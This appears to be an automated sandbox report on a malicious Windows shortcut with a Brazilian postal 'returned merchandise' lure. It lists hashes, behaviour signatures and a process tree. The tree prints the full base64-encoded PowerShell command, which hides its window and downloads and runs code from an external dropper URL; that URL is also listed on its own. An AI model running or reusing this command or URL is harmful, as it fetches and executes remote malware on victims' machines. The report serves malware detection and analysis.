858c09f6032b213e8cb62f48d6ecb7237637e9eea5866973905d6c1f13a81bdf

Analysis

max time kernel
119s
max time network
120s
platform
windows7_x64
resource
win7-20240903-en
resource tags

arch:x64arch:x86image:win7-20240903-enlocale:en-usos:windows7-x64system
submitted
13/09/2024, 19:03

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

Mercadoria_Devolvida-Correios-1YMU5EEM.lnk
Size

3KB
MD5

246e74b6fffb9d5994f7f70bb6509b45
SHA1

4b7bdf4808ce987b9f94ea40bdd081217867483a
SHA256

0db8cc27123c8bbd5ae0139980b604c514caeeed51da22d67d440e5369f8be1e
SHA512

178cf1ff0d8213ff94de68f5c1c267d50c3a958126925a2c50a554a29229c6f6834d1bf140fdb9f7168352d068880c7730e047e177496af0a8b57dde62fd8e08

Score

10^/10

Malware Config

Extracted

Language

ps1

Deobfuscated

URLs

ps1.dropper

https://1361227624.rsc.cdn77.org/v2/gl.php?aHR0cHM6Ly8xMzYxMjI3NjI0LnJzYy5jZG43Ny5vcmcvdjJ8d3IzMQ%3D%3D%

Signatures

Blocklisted process makes network request 2 IoCs

flow	pid	Process
5	2488	powershell.exe
6	2488	powershell.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Suspicious behavior: EnumeratesProcesses 2 IoCs

pid	Process
2488	powershell.exe
2488	powershell.exe

Suspicious use of AdjustPrivilegeToken 1 IoCs

description	pid	Process
Token: SeDebugPrivilege	2488	powershell.exe

Suspicious use of WriteProcessMemory 9 IoCs

description	pid	Process	procid_target
PID 2532 wrote to memory of 2488	2532	cmd.exe	31
PID 2532 wrote to memory of 2488	2532	cmd.exe	31
PID 2532 wrote to memory of 2488	2532	cmd.exe	31
PID 2488 wrote to memory of 2724	2488	powershell.exe	32
PID 2488 wrote to memory of 2724	2488	powershell.exe	32
PID 2488 wrote to memory of 2724	2488	powershell.exe	32
PID 2724 wrote to memory of 2760	2724	csc.exe	33
PID 2724 wrote to memory of 2760	2724	csc.exe	33
PID 2724 wrote to memory of 2760	2724	csc.exe	33

C:\Windows\system32\cmd.exe
cmd /c C:\Users\Admin\AppData\Local\Temp\Mercadoria_Devolvida-Correios-1YMU5EEM.lnk
1⤵
- Suspicious use of WriteProcessMemory
PID:2532
- C:\windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\windows\System32\WindowsPowerShell\v1.0\powershell.exe" -en YQBEAGQALQB0AFkAUABFACAALQBOAGEATQBFACAAQQAgAC0ATQBFAE0AYgBlAFIAZABlAGYAaQBOAEkAVABpAG8AbgAgACcAWwBEAGwAbABJAG0AcABvAHIAdAAoACIAdQBzAGUAcgAzADIALgBkAGwAbAAiACkAXQAgAHAAdQBiAGwAaQBjACAAcwB0AGEAdABpAGMAIABlAHgAdABlAHIAbgAgAGIAbwBvAGwAIABTAGgAbwB3AFcAaQBuAGQAbwB3ACgAaQBuAHQAIABoACwAIABpAG4AdAAgAHMAKQA7ACcAIAAtAE4AYQBtAGUAUwBQAEEAQwBFACAAQgA7AFsAQgAuAGEAXQA6ADoAUwBIAE8AdwBXAGkAbgBkAE8AVwAoACgAWwBzAFkAUwB0AGUAbQAuAGQAaQBhAEcATgBvAHMAdABpAEMAcwAuAFAAcgBvAEMAZQBzAFMAXQA6ADoARwBFAFQAYwB1AFIAcgBlAG4AVABwAFIAbwBDAGUAcwBzACgAKQAgAHwAIABQAFMAKQAuAG0AYQBJAG4AVwBJAE4ARABvAHcASABBAG4AZABsAGUALAAwACkAOwBJAEUAeAAoAE4ARQB3AC0AbwBCAGoAZQBDAHQAIABOAEUAVAAuAHcARQBCAGMAbABJAEUAbgBUACkALgBEAG8AVwBOAGwATwBhAEQAcwB0AFIASQBOAEcAKAAnAGgAdAB0AHAAcwA6AC8ALwAxADMANgAxADIAMgA3ADYAMgA0AC4AcgBzAGMALgBjAGQAbgA3ADcALgBvAHIAZwAvAHYAMgAvAGcAbAAuAHAAaABwAD8AYQBIAFIAMABjAEgATQA2AEwAeQA4AHgATQB6AFkAeABNAGoASQAzAE4AagBJADAATABuAEoAegBZAHkANQBqAFoARwA0ADMATgB5ADUAdgBjAG0AYwB2AGQAagBKADgAZAAzAEkAegBNAFEAJQAzAEQAJQAzAEQAJQAnACkA
  2⤵
  - Blocklisted process makes network request
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:2488
- - C:\Windows\Microsoft.NET\Framework64\v2.0.50727\csc.exe
    "C:\Windows\Microsoft.NET\Framework64\v2.0.50727\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\f2dixov0.cmdline"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:2724
  - - C:\Windows\Microsoft.NET\Framework64\v2.0.50727\cvtres.exe
      C:\Windows\Microsoft.NET\Framework64\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES89E9.tmp" "c:\Users\Admin\AppData\Local\Temp\CSC89E8.tmp"
      4⤵
      PID:2760

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\RES89E9.tmp

Filesize
1KB

MD5
b92d1869a415e7a3da0571abf2cc0ca0

SHA1
b3e735a403c1ea85394e3778b6ab20fbde07e96d

SHA256
66c7f7763eb7f86af3652f4cc585262d1277489b448154b822671eab83dc2e79

SHA512
deaa955eae3966c4e6446eb004f1407ca5320b5dcf2b110d0ee8f698f9d2ed12ed7aa7cd6abda6b810b4707c60f3fbb2cfd981ba273e8b38b05b63123973a829

Download Submit
C:\Users\Admin\AppData\Local\Temp\f2dixov0.dll

Filesize
3KB

MD5
3ad9d3464b8eb593146bdda89483f92e

SHA1
5fe6c16de8c0c4130762169a4771aa3276d25755

SHA256
ddff39fb640359198db0ed5e69f97076feabb027e5bab0ea88cbda53fafa57e8

SHA512
5f2c0cd41acd1b5394a7160b644593b6e567f93dece39aaa62570f5dd80596e59286d996c4c8ac14d108f9c5ddf7aae94afa4741f8685a676a719ad03b2b63c2

Download Submit
C:\Users\Admin\AppData\Local\Temp\f2dixov0.pdb

Filesize
7KB

MD5
bafffd26f6a288913e5bf4de026de934

SHA1
0e69eaad4d8d48602e756e3da8d59bcd28fde33f

SHA256
a4a67ff5b79a53eead4e427e06004534ed26cfe125538261a835dcce11f79e7a

SHA512
0180488d190feed31a1cda87fb2453fde9ce9b606f863ab39101eb7640d887f5fd91485114e2c68a1cc618c6e7a46e3a923212411db63ae302d9b1094dc68a11

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\CSC89E8.tmp

Filesize
652B

MD5
6e994116007f7ba9837c0ff8be4156e3

SHA1
7c3218176c99416485c8b3aeac572fbfdfab52d3

SHA256
accad0d61436b24d84079b08e4e1b0020f119ca640b36e0af2ab63ed0291ef43

SHA512
0f6d9437a4b44b9fd788521d09d531a6cefa24d45aa31faa1a7b1572560cfb4118ab35bd0e977b1a69fb888595744419910ba4712ef3014f7909e6d88d734907

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\f2dixov0.0.cs

Filesize
187B

MD5
7b0e7177dfbb9edd1c1ef08b4fdfae2f

SHA1
cb11a0252cdad66ec247312ccb7feb46456e52b6

SHA256
6caf22ef995616dc37bec21b2af3aa4597cdad88e00a13de0122db3af4e9a4aa

SHA512
7322be891145e550405917757420aeb513e5689970d34647177b1a79a12c7776d4e49c129b093be9927b46bc7582c0379e0cb520af58d4410ed4c5ef98b4dbfd

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\f2dixov0.cmdline

Filesize
309B

MD5
43861fae6d26de1f78827e2b490bcbd8

SHA1
620cded8ed08f68e04d1e95c3e4e77e44159cda3

SHA256
5ae3fb0aad1f05dcc8ec01189775b678a1967769f9597b2724cbeb41a4c6e5f8

SHA512
1f915f780c33fabb8c795f85f2c09ac676fb8d3cd4273abd666b5081387fb2ba266aeca3b6c6696e2f0327c9d880a8a68416b8d4759c34e02d56c607b612b935

Download Submit
memory/2488-43-0x000007FEF52A0000-0x000007FEF5C3D000-memory.dmp

Filesize
9.6MB

Download
memory/2488-45-0x000007FEF52A0000-0x000007FEF5C3D000-memory.dmp

Filesize
9.6MB

Download
memory/2488-38-0x000007FEF555E000-0x000007FEF555F000-memory.dmp

Filesize
4KB

Download
memory/2488-44-0x000007FEF52A0000-0x000007FEF5C3D000-memory.dmp

Filesize
9.6MB

Download
memory/2488-41-0x0000000002860000-0x0000000002868000-memory.dmp

Filesize
32KB

Download
memory/2488-42-0x000007FEF52A0000-0x000007FEF5C3D000-memory.dmp

Filesize
9.6MB

Download
memory/2488-39-0x000000001B4C0000-0x000000001B7A2000-memory.dmp

Filesize
2.9MB

Download
memory/2488-59-0x000000001BBB0000-0x000000001BBB8000-memory.dmp

Filesize
32KB

Download
memory/2488-40-0x000007FEF52A0000-0x000007FEF5C3D000-memory.dmp

Filesize
9.6MB

Download
memory/2488-62-0x000007FEF52A0000-0x000007FEF5C3D000-memory.dmp

Filesize
9.6MB

Download
memory/2488-63-0x000007FEF555E000-0x000007FEF555F000-memory.dmp

Filesize
4KB

Download
memory/2488-64-0x000007FEF52A0000-0x000007FEF5C3D000-memory.dmp

Filesize
9.6MB

Download